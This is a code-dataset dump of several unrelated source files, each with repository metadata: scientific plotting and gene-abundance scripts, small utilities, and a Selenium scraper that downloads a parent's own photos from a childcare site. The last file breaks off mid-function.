[ "MIT" ]
null
null
null
scripts/figures/gene_abundance.py
vic-cheung/vectorseq
6f1aaeb3035c3c939b442e30076504ff84e43aa5
[ "MIT" ]
null
null
null
#%% import scanpy as sc import pandas as pd from pathlib import Path from vectorseq.utils import check_gene_abundance, create_dir from vectorseq.marker_constants import BrainGenes data_dir = Path("/spare_volume/vectorseq-data") figure_save_dir = create_dir(data_dir / "gene_abundance") #%% [markdown] # ## Gene Abundance Table for Experiment: 3250, Brain Region: v1 #%% experiment_id = "3250" brain_region = "v1" run_dir = data_dir / experiment_id / brain_region all_cells_output_dir = create_dir(run_dir / "all_cells") adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad") filtered_tg_list = [ gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns ] endogenous_genes_list = [ "Snap25", "Rbfox3", "Slc17a6", "Camk2a", "Gad1", "Gad2", "Mog", "Flt1", ] gene_list = filtered_tg_list + endogenous_genes_list count_fractions_df = pd.DataFrame() for gene in gene_list: temp = check_gene_abundance(adata, gene_of_interest=gene) if not temp.empty: count_fractions_df = count_fractions_df.append( pd.DataFrame.from_dict( { "gene": gene, "number_of_expressing_cells": temp.shape[0], "number_of_reads": temp.goi_counts.sum(), "abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}", }, orient="index", ).T ) print(f"{gene} detected.") else: print(f"{gene} not detected.") count_fractions_df.set_index(keys="gene", drop=True, inplace=True) count_fractions_df.to_csv( figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv" ) # %% #%% [markdown] # ## Gene Abundance Table for Experiment: 3382, Brain Region: snr #%% experiment_id = "3382" brain_region = "snr" run_dir = data_dir / experiment_id / brain_region all_cells_output_dir = create_dir(run_dir / "all_cells") adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad") filtered_tg_list = [ gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns ] endogenous_genes_list = [ "Snap25", "Rbfox3", "Slc17a6", "Camk2a", "Gad1", "Gad2", "Mog", "Flt1", ] gene_list = filtered_tg_list + endogenous_genes_list count_fractions_df = pd.DataFrame() for gene in gene_list: temp = check_gene_abundance(adata, gene_of_interest=gene) if not temp.empty: count_fractions_df = count_fractions_df.append( pd.DataFrame.from_dict( { "gene": gene, "number_of_expressing_cells": temp.shape[0], "number_of_reads": temp.goi_counts.sum(), "abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}", }, orient="index", ).T ) print(f"{gene} detected.") else: print(f"{gene} not detected.") count_fractions_df.set_index(keys="gene", drop=True, inplace=True) count_fractions_df.to_csv( figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv" ) # %% #%% [markdown] # ## Gene Abundance Table for Experiment: 3454, Brain Region: sc #%% data_dir = Path("/spare_volume/vectorseq-data") experiment_id = "3454" brain_region = "sc" run_dir = data_dir / experiment_id / brain_region all_cells_output_dir = create_dir(run_dir / "all_cells") adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad") filtered_tg_list = [ gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns ] endogenous_genes_list = [ "Snap25", "Rbfox3", "Slc17a6", "Camk2a", "Gad1", "Gad2", "Mog", "Flt1", ] gene_list = filtered_tg_list + endogenous_genes_list count_fractions_df = pd.DataFrame() for gene in gene_list: temp = check_gene_abundance(adata, gene_of_interest=gene) if not temp.empty: count_fractions_df = count_fractions_df.append( pd.DataFrame.from_dict( { "gene": gene, "number_of_expressing_cells": temp.shape[0], "number_of_reads": temp.goi_counts.sum(), "abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}", }, orient="index", ).T ) print(f"{gene} detected.") else: print(f"{gene} not detected.") count_fractions_df.set_index(keys="gene", drop=True, inplace=True) count_fractions_df.to_csv( figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv" ) #%%
30.402516
141
0.646463
626
4,834
4.654952
0.161342
0.072066
0.082361
0.047358
0.886754
0.886754
0.87337
0.849348
0.849348
0.849348
0
0.019055
0.22921
4,834
158
142
30.594937
0.763017
0.049441
0
0.770992
0
0.022901
0.233829
0.138767
0
0
0
0
0
1
0
false
0
0.038168
0
0.038168
0.045802
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
41309aa7b95e9754a43f4174cd8bb81a323ae14b
9,102
py
Python
etreebrowser/graph.py
CameronJRAllan/eTree-Browser
72601450eb8538f79511715c5793a8594bdcfc80
[ "MIT" ]
1
2019-07-19T20:03:00.000Z
2019-07-19T20:03:00.000Z
etreebrowser/graph.py
CameronJRAllan/eTree-Browser
72601450eb8538f79511715c5793a8594bdcfc80
[ "MIT" ]
null
null
null
etreebrowser/graph.py
CameronJRAllan/eTree-Browser
72601450eb8538f79511715c5793a8594bdcfc80
[ "MIT" ]
null
null
null
from PyQt5 import QtWidgets, QtCore from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.figure import Figure from matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Cantarell'] import matplotlib.pyplot as plt import matplotlib.patches as mpatch import numpy as np import operator import matplotlib.patheffects as path_effects class CalmaPlot(FigureCanvas): """ This class provides functionality for providing graphical representations of CALMA data. """ def __init__(self, width, height, dpi, hasCalma, parent=None): """ Constructs an instance of the CALMA graphing class. An instance of CalmaPlot inherits FigureClass, a MatPlotLib class for displaying plots in the text of a PyQt5 application. It generates a figure (upon which we may draw), as well as a canvas to place the figure upon. Parameters ---------- weight : int The width of the figure to be created. height : int The height of the figure to be created. dpi : int The dots-per-inch for the figure typically 100. """ # Create Figure instance (which stores our plots) self.fig = Figure(figsize=(2, 2), dpi=dpi, edgecolor='blue') # Add an initial plot to our figure self.canvasGraph = self.fig.add_subplot(111) # Fetch colour map self.colourMap = self.get_colour_map() # Initialize figure canvas, which initializes an instance of QtWidget FigureCanvas.__init__(self, self.fig) self.setParent(parent) # Store reference to axes self.ax = self.fig.gca() # Hide tick labels to create default style self.ax.set_yticklabels([]) self.ax.set_xticklabels([]) # Add placeholder text if hasCalma: self.placeHolderText = self.fig.text(0.5, 0.65,'Click on a performance track for CALMA data',horizontalalignment='center', verticalalignment='center', fontsize=16) else: self.placeHolderText = self.fig.text(0.5, 0.65,'No CALMA data available for this query',horizontalalignment='center', verticalalignment='center', fontsize=16) # Make background transparent self.fig.patch.set_alpha(1.0) # Resize with window FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) FigureCanvas.updateGeometry(self) self.setMinimumSize(self.size()) def get_segment_colour_map(self, features): """ Generates a colour map for segment features. Parameters ---------- features : float[] Features information. Returns ---------- newColourMap : str[] Colour map for each segment type. """ hashList = {'1' : 'Grey', '2':'Red', '3':'Green', '4':'greenyellow', '5':'Pink', '6':'Orange', '7':'goldenrod', '8':'indianred', '9':'peachpuff', '10':'deepskyblue', '11':'firebrick', '12':'orchid', '13': 'moccasin', '14':'slateblue', '15':'turquoise', '16':'tomato', '17':'darkmagenta', '18':'olivedrab'} return hashList def plot_calma_data(self, loudnessValues, features, duration, type, **kwargs): """ Takes CALMA data for a single track as input, and creates a plot. Parameters ---------- loudnessValues : float[] An array of loudness / amplitude values. features : float[] Features information. duration : float The duration of the track. """ # Replace colour map if needed if type == 'segment' : self.colourMap = self.get_segment_colour_map(features) if type == 'key' : self.colourMap = self.get_colour_map() # Hide placeholder text if visible try: self.placeHolderText.remove() text = self.fig.text(0.5, 0.65, kwargs['title'], horizontalalignment='center', verticalalignment='center', fontsize=16) text.set_path_effects([path_effects.Stroke(linewidth=2, foreground='white'), path_effects.Normal()]) except (KeyError, ValueError) as v: self.placeHolderText.set_text('') # Perform pre-processing nploudnessValues, duration, xSpaced, average = self.pre_processing(loudnessValues, duration) # Plot waveform self.canvasGraph.axes.cla() self.canvasGraph.plot(xSpaced, nploudnessValues) for index, key in enumerate(features): # Calculate graph positions lx, ly, rec = self.calculate_graph_element_position(features, key, index, duration, average) # Add annotation to plot self.canvasGraph.annotate(key[1], (lx, ly), weight='bold', color='Black', fontsize=7, ha='center', va='center', rotation=270) self.ax.add_artist(rec) # Set axes labels self.ax.set_yticklabels([]) self.ax.set_xlabel("Time (seconds)") # Add colour legend for keys keysAsSet = list(set([x[1] for x in features])) patches = [] for k in keysAsSet: # Plot rectangle for key changes try: fc = self.colourMap[k] except KeyError as keyerr: fc = 'grey' patch = mpatch.Patch(color=fc, label=k) patches.append(patch) self.canvasGraph.legend(handles=patches, bbox_to_anchor=(1.00, 1), loc=2, borderaxespad=0, fontsize=7, ncol=2) self.fig.subplots_adjust(left=0.00, right=0.85, top=0.95) try: kwargs['release'] except KeyError as v: # Causes crash with multiple plots self.finishDraw() self.fig.patch.set_alpha(1.0) return def calculate_graph_element_position(self, keyInfo, key, index, duration, average): """ Calculates the position of the rectangular patch, relative to the event duration. Parameters ---------- keyInfo : String[] Track meta-data such as label. key : float[] Features information. index : int Index in the keys we are processing. duration : float The duration of the track. average : float Average signal amplitude value of the track. Return ---------- ly : int The y position of the patch. lx : int The x position of the patch. rec : Rectangular A rectangular patch object. """ # Rectangle takes (lowerleftpoint=(X, Y), width, height) xy = (float(key[0]), self.ax.get_ylim()[1]) # If not the latest element in the key-change data if index < len(keyInfo) - 1: # Swap width and height as we are rotating 270 degrees height = keyInfo[index + 1][0] - keyInfo[index][0] else: height = duration - keyInfo[index][0] width = self.ax.get_ylim()[1] angle = 270 # Plot rectangle for key changes try: fc = self.colourMap[key[1]] except KeyError as k: fc = 'grey' rec = mpatch.Rectangle(xy, width, height, angle=angle, alpha=0.5, fc=fc) # Calculate label positions rx, ry = rec.get_xy() lx = rx + rec.get_height() / 2.0 ly = average return lx, ly, rec def get_colour_map(self): """ Returns a colour map for key changes to ensure consistent patterns across CALMA plots. """ try: return {'C# minor' : 'Grey', 'A major' : 'Red', 'D minor' : 'Green', 'Eb Purple': 'greenyellow', 'D major' : 'Pink', 'G major' : 'Orange', 'G minor': 'goldenrod', 'A minor' : 'indianred', 'C minor' : 'peachpuff', 'B minor' : 'deepskyblue', 'Ab Major' : 'firebrick', 'Eb / D# minor' : 'orchid', 'Ab major' : 'moccasin', 'G# minor' : 'slateblue', 'Eb major' : 'turquoise', 'C major' : 'tomato', 'B major' : 'darkmagenta', 'F major' : 'olivedrab', 'F minor' : 'olive', 'Bb major' : 'lightsteelblue', 'Db major' : 'plum', 'Bb minor' : 'mediumspringgreen', 'E minor' : 'lightsalmon', 'F# / Gb major' : 'gold', 'F# minor' : 'burlywood'} # If colour not found to match, return grey as a last resort except KeyError as e: print('Unmatched colour: {0}'.format(e)) return 'Grey' def pre_processing(self, loudnessValues, duration): # Clip loudnessValues = loudnessValues[100:-50] nploudnessValues = np.array(loudnessValues) # Frame-rate is the number of values provided, divided by the duration frame_rate = len(nploudnessValues) / duration # Calculate average for placing labels on Y-AXIS average = sum(loudnessValues) / len(loudnessValues) # Generate linear spacing for seconds in X-AXIS xSpaced = np.linspace(0, len(loudnessValues) / frame_rate, num=len(loudnessValues)) return nploudnessValues, duration, xSpaced, average def finishDraw(self): self.fig.canvas.draw_idle()
33.340659
128
0.614041
1,082
9,102
5.114603
0.33549
0.013914
0.006505
0.010842
0.117094
0.112035
0.062161
0.028551
0.028551
0
0
0.017057
0.272138
9,102
273
129
33.340659
0.818264
0.285761
0
0.115385
0
0
0.133247
0
0
0
0
0
0
1
0.053846
false
0
0.069231
0
0.176923
0.007692
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4130f4d682db7205fa5d7279b9c35cacaaafe8cb
319
py
Python
framework/core/error_views.py
ravique/otus-framework
46a519ff4b64c2be7fc23f8f43eefdd3b0c94512
[ "MIT" ]
null
null
null
framework/core/error_views.py
ravique/otus-framework
46a519ff4b64c2be7fc23f8f43eefdd3b0c94512
[ "MIT" ]
null
null
null
framework/core/error_views.py
ravique/otus-framework
46a519ff4b64c2be7fc23f8f43eefdd3b0c94512
[ "MIT" ]
1
2019-06-28T21:08:55.000Z
2019-06-28T21:08:55.000Z
from framework.core.template_handlers import env, render_template def not_found_view(request, **kwargs): return 'Page not found :(' def forbidden_view(request, **kwargs): context = kwargs.get('context') template = env.get_template('forbidden.html') return render_template(template, context=context)
26.583333
65
0.746082
40
319
5.775
0.5
0.121212
0.147186
0
0
0
0
0
0
0
0
0
0.141066
319
11
66
29
0.843066
0
0
0
0
0
0.119122
0
0
0
0
0
0
1
0.285714
false
0
0.142857
0.142857
0.714286
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
413328f9159158b7e73d6e4e594f24dbc66f5d32
358
py
Python
scripts/speed.py
Maxence-Santos/space-invader
4ac359f61ab673c816005d0d85567c3227ec06a1
[ "MIT" ]
null
null
null
scripts/speed.py
Maxence-Santos/space-invader
4ac359f61ab673c816005d0d85567c3227ec06a1
[ "MIT" ]
null
null
null
scripts/speed.py
Maxence-Santos/space-invader
4ac359f61ab673c816005d0d85567c3227ec06a1
[ "MIT" ]
null
null
null
import pygame import os class Speed: def __init__(self,X): self.X = X self.Y = 700 self.image = pygame.image.load(os.path.join("img/speed_power_up.png")) self.image = pygame.transform.scale(self.image, (55, 55)) def update_and_draw(self,screen): screen.blit(self.image, (self.X, self.Y))
27.538462
79
0.594972
52
358
3.942308
0.519231
0.17561
0.087805
0
0
0
0
0
0
0
0
0.02682
0.27095
358
13
80
27.538462
0.758621
0
0
0
0
0
0.063401
0.063401
0
0
0
0
0
1
0.2
false
0
0.2
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4133f8869dd2769312a3bb4f13caa9cc3c94d267
821
py
Python
supermariopy/tfutils/image.py
theRealSuperMario/supermariopy
9fff8275278ff26caff50da86109c25d276bb30b
[ "MIT" ]
36
2019-07-14T16:10:37.000Z
2022-03-29T10:11:03.000Z
supermariopy/tfutils/image.py
theRealSuperMario/supermariopy
9fff8275278ff26caff50da86109c25d276bb30b
[ "MIT" ]
3
2019-10-09T15:11:13.000Z
2021-07-31T02:17:43.000Z
supermariopy/tfutils/image.py
theRealSuperMario/supermariopy
9fff8275278ff26caff50da86109c25d276bb30b
[ "MIT" ]
14
2019-08-29T14:11:54.000Z
2022-03-06T13:41:56.000Z
import tensorflow as tf def resize_bilinear(x, shape): """ Raises a warning if tensorflow version is too in order to buggy behavior References ---------- [1]: https://github.com/tensorflow/tensorflow/issues/6720 [2]: https://github.com/tensorflow/tensorflow/issues/33691 """ tf_version = tf.__version__ major_version, minor_version, _ = tf_version.split(".") version = int(major_version) * 100 + int(minor_version) if version < 114: # 1.14 raise NotImplementedError( "Resize bilinear is buggy for tensorflow version below 1.14" ) elif version >= 114 and version < 115: # 114 return tf.image.resize_bilinear(x, shape, align_corners=True) elif version >= 115: return tf.image.resize_bilinear(x, shape, align_corners=True)
34.208333
76
0.665043
105
821
5.047619
0.466667
0.10566
0.084906
0.113208
0.335849
0.335849
0.184906
0.184906
0.184906
0.184906
0
0.054945
0.224117
821
23
77
35.695652
0.77708
0.270402
0
0.153846
0
0
0.10424
0
0
0
0
0
0
1
0.076923
false
0
0.076923
0
0.307692
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41347176b216823b2850da2216f2fdd2a2569240
1,746
py
Python
aleph/util.py
mcrouse911/findpeopleviadocument
fecb99a5c167dd281af324f8c862fda70021f081
[ "MIT" ]
null
null
null
aleph/util.py
mcrouse911/findpeopleviadocument
fecb99a5c167dd281af324f8c862fda70021f081
[ "MIT" ]
null
null
null
aleph/util.py
mcrouse911/findpeopleviadocument
fecb99a5c167dd281af324f8c862fda70021f081
[ "MIT" ]
null
null
null
# coding: utf-8 import time import random import logging from celery import Task from banal import ensure_list from normality import stringify from pkg_resources import iter_entry_points log = logging.getLogger(__name__) EXTENSIONS = {} def get_extensions(section): if section not in EXTENSIONS: EXTENSIONS[section] = {} if not EXTENSIONS[section]: for ep in iter_entry_points(section): EXTENSIONS[section][ep.name] = ep.load() return list(EXTENSIONS[section].values()) def dict_list(data, *keys): """Get an entry as a list from a dict. Provide a fallback key.""" for key in keys: if key in data: return ensure_list(data[key]) return [] def backoff(failures=0): failures = min(7, failures) sleep = 2 ** (failures + random.random()) log.debug("Back-off: %.2fs", sleep) time.sleep(sleep) def html_link(text, link): text = text or '[untitled]' if link is None: return "<span class='reference'>%s</span>" % text return "<a class='reference' href='%s'>%s</a>" % (link, text) def anonymize_email(name, email): """Generate a simple label with both the name and email of a user.""" name = stringify(name) email = stringify(email) if email is None: return name if '@' in email: mailbox, domain = email.rsplit('@', 1) if len(mailbox): repl = '*' * (len(mailbox) - 1) mailbox = mailbox[0] + repl email = '%s@%s' % (mailbox, domain) if name is None: return email return '%s <%s>' % (name, email) class SessionTask(Task): def on_failure(self, exc, task_id, args, kwargs, einfo): from aleph.core import db db.session.remove()
26.059701
73
0.623711
237
1,746
4.523207
0.413502
0.079291
0.033582
0
0
0
0
0
0
0
0
0.006121
0.251432
1,746
66
74
26.454545
0.814078
0.079038
0
0
0
0
0.068879
0.016907
0
0
0
0
0
1
0.122449
false
0
0.163265
0
0.469388
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4134733b100980a0fe17da1135eb9bebe76ac9be
495
py
Python
psola/utilities/find.py
diguo2046/psola
a45fff605c4ea75145deb4a316924026bf278f85
[ "MIT" ]
43
2018-05-23T05:45:28.000Z
2021-11-28T08:11:01.000Z
psola/utilities/find.py
diguo2046/psola
a45fff605c4ea75145deb4a316924026bf278f85
[ "MIT" ]
null
null
null
psola/utilities/find.py
diguo2046/psola
a45fff605c4ea75145deb4a316924026bf278f85
[ "MIT" ]
15
2018-05-16T04:59:30.000Z
2021-05-16T08:57:37.000Z
#!/usr/bin/env python """ psola.utilities.find Implements a function that sort-of works like MATLAB's find This is preferable to importing `find' from pylab, IMO Author: jreinhold Created on: Aug 18, 2017 """ import numpy as np def find(x): """ kind-of mimics the find command in matlab, really created to avoid repetition in code Args: x (numpy mask): condition, e.g., x < 5 Returns: indices where x is true """ return np.squeeze(np.where(x))
18.333333
59
0.660606
77
495
4.246753
0.766234
0.036697
0
0
0
0
0
0
0
0
0
0.018667
0.242424
495
26
60
19.038462
0.853333
0.757576
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
4136db303bfc69cac0328040053f475ee2387084
20,461
py
Python
tadpole-catcher.py
tandalesc/tadpole-catcher
5c5a7fce892aeb6f4c237ff14843fb325032b3bf
[ "BSD-3-Clause" ]
null
null
null
tadpole-catcher.py
tandalesc/tadpole-catcher
5c5a7fce892aeb6f4c237ff14843fb325032b3bf
[ "BSD-3-Clause" ]
null
null
null
tadpole-catcher.py
tandalesc/tadpole-catcher
5c5a7fce892aeb6f4c237ff14843fb325032b3bf
[ "BSD-3-Clause" ]
null
null
null
"""This module downloads all photos/videos from tadpole to a local folder.""" import os from os.path import abspath, dirname, join, isfile, isdir import re import sys import json import time import pickle import logging import logging.config from random import randrange from getpass import getpass from configparser import ConfigParser from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains from selenium.common.exceptions import NoSuchElementException import requests class DownloadError(Exception): """An exception indicating some errors during downloading""" pass class Image(object): url_re = re.compile('\\("([^"]+)') url_search = lambda div: Image.url_re.search(div.get_attribute("style")) def __init__(self, div, date=None): self.div = div # Extract URL from div _url = Image.url_search(div).group(1) _url = _url.replace('thumbnail=true', '') _url = _url.replace('&thumbnail=true', '') self.url = 'https://www.tadpoles.com' + _url # Extract id from div # Shorten _id to avoid OS file length limit # TODO more robust id algorithm _id = div.get_attribute('id').split('-')[1] _id = _id[int(len(_id)/2):] self.id = _id # Save date (defaults to None) self.date = date # Get key (for downloading) _, self.key = self.url.split("key=") @property def date_text(self): return "{:02d}".format(self.date if self.date is not None else 1) class Report(object): def __init__(self, div): self.div = div self.display_text = div.get_attribute('outerText') date = int(self.display_text.split('\n')[1].split('/')[1]) self.date_text = "{:02d}".format(date) class Client: """The main client class responsible for downloading pictures/videos""" COOKIE_FILE = "cookies.pkl" ROOT_URL = "http://www.tadpoles.com/parents" HOME_URL = "https://www.tadpoles.com/parents" CONFIG_FILE_NAME = "conf.json" MIN_SLEEP = 1 MAX_SLEEP = 3 MONTHS = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec'] def __init__(self, config, download_reports=True): self.init_logging() self.browser = None self.cookies = None self.req_cookies = None self.__current_month__ = None self.__current_year__ = None self.current_child = None self.download_reports = download_reports self.config = config # e.g. {'jan':'01', 'feb':'02', ...} self.month_lookup = {month: "{:02d}".format(Client.MONTHS.index(month)+1) for month in Client.MONTHS} def config_login_info(self): return self.config['AUTHENTICATION'] def config_requests_info(self): return self.config['DOWNLOADS'] def init_logging(self): """Set up logging configuration""" # Create logging dir directory = dirname('logs/') if not isdir(directory): os.makedirs(directory) logging_config = dict( version=1, formatters={ 'f': { 'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'} }, handlers={ 'h': { 'class': 'logging.StreamHandler', 'formatter': 'f', 'level': logging.DEBUG }, 'f': { 'class': 'logging.FileHandler', 'formatter': 'f', 'filename': 'logs/tadpole.log', 'level': logging.INFO} }, root={ 'handlers': ['h', 'f'], 'level': logging.DEBUG, }, ) logging.config.dictConfig(logging_config) self.logger = logging.getLogger('tadpole-catcher') def __enter__(self): self.logger.info("Starting browser") self.browser = webdriver.Chrome() self.browser.implicitly_wait(10) self.logger.info("Got a browser") return self def __exit__(self, *args): self.logger.info("Shutting down browser") self.browser.quit() def sleep(self, minsleep=None, maxsleep=None): """Sleep a random amount of time bound by the min and max value""" _min = minsleep or self.MIN_SLEEP _max = maxsleep or self.MAX_SLEEP duration = randrange(_min * 100, _max * 100) / 100.0 self.logger.info('Sleeping %r', duration) time.sleep(duration) def navigate_url(self, url): """Force the browser to go a url""" self.logger.info("Navigating to %r", url) self.browser.get(url) def load_cookies(self): """Load cookies from a previously saved ones""" self.logger.info("Loading cookies.") with open(self.COOKIE_FILE, "rb") as file: self.cookies = pickle.load(file) def dump_cookies(self): """Save cookies of the existing session to a file""" self.logger.info("Dumping cookies.") self.cookies = self.browser.get_cookies() with open(self.COOKIE_FILE, "wb") as file: pickle.dump(self.browser.get_cookies(), file) def add_cookies_to_browser(self): """Load the saved cookies into the browser""" self.logger.info("Adding the cookies to the browser.") for cookie in self.cookies: if self.browser.current_url.strip('/').endswith(cookie['domain']): self.browser.add_cookie(cookie) def requestify_cookies(self): """Transform the cookies to what the request lib requires.""" self.logger.info("Transforming the cookies for requests lib.") self.req_cookies = {} for s_cookie in self.cookies: self.req_cookies[s_cookie["name"]] = s_cookie["value"] def switch_windows(self): '''Switch to the other window.''' self.logger.info("Switching windows.") all_windows = set(self.browser.window_handles) current_window = set([self.browser.current_window_handle]) other_window = (all_windows - current_window).pop() self.browser.switch_to.window(other_window) def get_current_child(self): return self.get_children_params()[self.current_child_ind] def get_child_name(self): display_name = self.get_current_child()['display_name'] return display_name.split(' ')[0] def get_num_children(self): return len(self.get_children_params()) def get_children_params(self): #tadpoles does not provide the children attribute if there is only one child if 'children' in self.app_params: return self.app_params['children'] else: #if there is only one child, provide default parameters return [{'display_name': 'child'}] def has_next_child(self): return self.current_child_ind+1 < self.get_num_children() # add 1 to current child index, and reset to 0 if too many def next_child(self): if self.has_next_child(): self.current_child_ind+=1 else: self.current_child_ind=0 def do_login(self): """Perform login to tadpole (without Google SSO)""" self.logger.info("Navigating to login page.") self.browser.find_element_by_id("login-button").click() self.browser.find_element_by_class_name("tp-block-half").click() self.browser.find_element_by_class_name("other-login-button").click() # Get email, password, and submit elements form = self.browser.find_element_by_class_name("form-horizontal") email_form = self.find_by_xpath('//input[@type="text"]', 'Email field', form) pwd_form = self.find_by_xpath('//input[@type="password"]', 'Password field', form) submit = self.find_by_xpath('//button[@type="submit"]', 'Submit button', form) # Fill out info and submit email = self.config_login_info()['username'] pwd = self.config_login_info()['password'] if email is '' or pwd is '': self.logger.info("'settings.ini' does not contain authentication information. Falling back to user-inputted values.") email = input("Enter email: ") pwd = input("Enter password: ") email_form.send_keys(email) pwd_form.send_keys(pwd) self.logger.info("Clicking 'submit' button.") submit.click() self.logger.info("Sleeping 2 seconds.") self.sleep(minsleep=2) def iter_monthyear(self): '''Yields pairs of xpaths for each year/month tile on the right hand side of the user's home page. ''' month_xpath_tmpl = '//*[@id="app"]/div[3]/div[1]/ul/li[%d]/div/div/div/div/span[%d]' month_index = 1 while True: month_xpath = month_xpath_tmpl % (month_index, 1) year_xpath = month_xpath_tmpl % (month_index, 2) # Go home if not there already. if self.browser.current_url != self.HOME_URL: self.navigate_url(self.HOME_URL) # Find the next month and year elements. month = self.find_by_xpath(month_xpath, "any more months") year = self.find_by_xpath(year_xpath, "any more years") self.__current_month__ = month self.__current_year__ = year yield month month_index += 1 def iter_urls(self): '''Find all the image urls on the current page. ''' if self.download_reports: # Click the "All" button, so reports are included in our iterator self.sleep(1, 3) # Ensure page is loaded self.logger.info("Clicking 'All' button to load reports") all_btn = self.find_by_xpath('//*[@id="app"]/div[3]/div[2]/div[1]/div[2]/ul/li[1]', "'All' button on the Timeline") all_btn.click() # For each month on the dashboard... for month in self.iter_monthyear(): # Navigate to the next month. month.click() self.logger.info("Getting urls for month: %s", month.text) self.sleep(minsleep=5, maxsleep=7) # For each child... for child in range(self.get_num_children()): # Click on child if needed if(self.get_num_children() > 1): self.logger.info("Clicking on %s's page", self.get_child_name()) #0 ->2nd li, 1->3rd li, etc. cur_child_xpath = '//*[@id="app"]/div[2]/div[3]/ul/li[%s]/li/div' % str(self.current_child_ind+2) current_child = self.find_by_xpath(cur_child_xpath, "link to %s's page" % self.get_child_name()) # click events are only activated on mouseover chain = ActionChains(self.browser).move_to_element_with_offset(current_child, 5, 5).click() chain.perform() # Bools to correctly identify reports and images report = lambda div: (not Image.url_search(div)) and ('report' in div.get_attribute('outerText')) image = lambda div: Image.url_search(div) and ('thumbnail' in Image.url_search(div).group(1)) elements = self.browser.find_elements_by_xpath('//div[@class="well left-panel pull-left"]/ul/li/div') # Collect media files until we see a report # Once we see a report, apply that date to all seen media files # Yield processed media files, and then the report # Deal with edge case where no report is found media_buffer = [] for div in elements: if image(div): img = Image(div=div) media_buffer.append(img) elif report(div): _report = Report(div=div) # Apply date to all elements in buffer date_text = _report.date_text for img in media_buffer: img.date = int(date_text) # For each image/video, pop from buffer and yield while len(media_buffer) > 0: yield media_buffer.pop() # Once images are processed, yield report div yield _report # Handle edge case where there are media files but no report while len(media_buffer) > 0: yield media_buffer.pop() # Goto next child, if possible self.next_child() def save_report(self, report): '''Save a report given the appropriate div. ''' # Make file name child_text = self.get_child_name().lower() year_text = self.__current_year__.text month_text = self.month_lookup[self.__current_month__.text] date_text = report.date_text filename_parts = ['download', child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}.{}'] filename_report = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, 'html')) # Only download if the file doesn't already exist. if isfile(filename_report): self.logger.info("Already downloaded report: %s", filename_report) return # Make sure the parent dir exists. directory = dirname(filename_report) if not isdir(directory): os.makedirs(directory) self.logger.info("Downloading report: %s", filename_report) div = report.div # Click on div div.click() self.sleep(1, 2) # Wait to load # Extract body body = self.browser.find_element_by_class_name('modal-overflow-wrapper') text = body.get_attribute('innerHTML') # Close pop-up x = self.find_by_xpath('//*[@id="dr-modal-printable"]/div[1]/i', 'Close Popup Button') x.click() # Wait to load self.sleep(1, 2) with open(filename_report, 'w', encoding='UTF-8') as report_file: self.logger.info("Saving: %s", filename_report) report_file.write("<html>") report_file.write(text) report_file.write("</html>") self.logger.info("Finished saving: %s", filename_report) def save_image(self, img): '''Save an image locally using requests. ''' url = img.url date_text = img.date_text _id = img.id key = img.key year_text = self.__current_year__.text month_text = self.month_lookup[self.__current_month__.text] child_text = self.get_child_name().lower() default_download_dir = self.config_requests_info()['default_download_dir'] # Make the local filename. filename_parts = [default_download_dir, child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}-{}.{}'] filename_jpg = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'jpg')) # we might even get a png file even though the mime type is jpeg. filename_png = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'png')) # We don't know if we have a video or image yet so create both name filename_video = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'mp4')) # Only download if the file doesn't already exist. if isfile(filename_jpg): self.logger.info("Already downloaded image: %s", filename_jpg) return if isfile(filename_video): self.logger.info("Already downloaded video: %s", filename_video) return if isfile(filename_png): self.logger.info("Already downloaded png file: %s", filename_png) return self.logger.info("Downloading from: %s", url) # Make 